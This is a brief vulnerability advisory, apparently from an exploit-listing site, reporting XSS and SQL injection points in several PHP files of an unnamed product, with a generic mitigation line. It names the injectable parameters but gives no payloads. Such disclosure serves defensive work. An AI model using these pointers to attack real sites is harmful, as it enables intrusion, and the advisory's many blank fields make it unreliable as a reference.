Vendor: N/A
By: kaozc9
CVSS: 7.5 (HIGH)
Cross-Site Scripting (XSS) and SQL Injection
CWE: 79 (XSS) and 89 (SQL Injection)
Product Name: N/A
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020
XSS and SQL Injection Vulnerabilities
The vulnerable files are search.php, uploads.php, file.php, cut.php and upload.php. An attacker can inject malicious JavaScript code into search.php and uploads.php via the ‘key’ and ‘p’ parameters respectively. Similarly, an attacker can inject malicious SQL code into file.php, cut.php and upload.php via the ‘id’ parameter.
Mitigation:
Input validation and output encoding should be used to prevent XSS and SQL Injection attacks.